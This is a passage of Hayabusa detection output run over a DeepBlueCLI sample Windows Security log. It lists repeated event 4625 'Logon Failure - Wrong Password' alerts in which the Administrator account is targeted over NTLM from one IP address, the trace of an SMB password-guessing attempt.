NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ca4dlxyEco3VOapw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6lJc7DXAOcNZ2G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Olt5mS7na07VDJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCFeQcUMDTs0ev8v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FYmH6CQrizoZ1DAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iYtujXkzySwZQFk8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KE9v6wzrebvjvDIl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81gmRFFBHI1s4dqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C8gHWPDjQM8M3tiQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: szj4mJvtFV06CuR2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ceGEl87hOM0InAAd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XRv3C3rRxYXTgckj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TaPkJPIQnbL3VyUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZ7PZAT6hWWHNc29 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJVD4uVhwfLSJ6Ab | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6KME1I6tE0v9UAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Qtt1rk4n3tOJko2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: prPsA8EZHGfGPSHm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQqGXnwHtB87LSzT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6uLT1bjaIS0XBsWC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIgpraQTxFrcLphN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1D6qy57XImq4prx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Kw44Ffh4DIPlyuM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oKUdmKU74RmJysAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gZUTzZw0T1tYRSP5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nEOfjuAMa7HTsfcP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e7bG19emMTmyBQNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YsLkgWukfqS3wWJK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: liFcZjjpY3xXwe9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBUgbfzx2OEcOxWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVCV0WoZmLTFNH71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJmxGOqck4oQi1kL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w7lYqaUvEtTp18DK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ9xQmGn61JJDeQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XuMXpvY9fmLm0eBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ofesuNErTLWuN0k4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsNq7SThd3b8oTwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmRWg5gNRcxDMFjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JXrGn6LehVwTGNNj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIq9DS71jCjWbgdY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kw2BQbdUml0EPNOs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugOqsKQFGmmLac3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3rZHUbOUVBYiHarB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: otv8ByrbWWoTz7pi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HVlHkJu4Gxc9dhxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKF5OCqLVVKvung0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avAdpkOlP0xji1vG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VFgzMjEz6M0LBnX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdJb0obVAqkY9GCw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ciSoQcLUgLfzaNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RECrGCCTJuDPlvYJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Z2w67uyC2NOgecT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRVetRdHvz0lJkOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 192.168.198.149 | AuthPackage: 
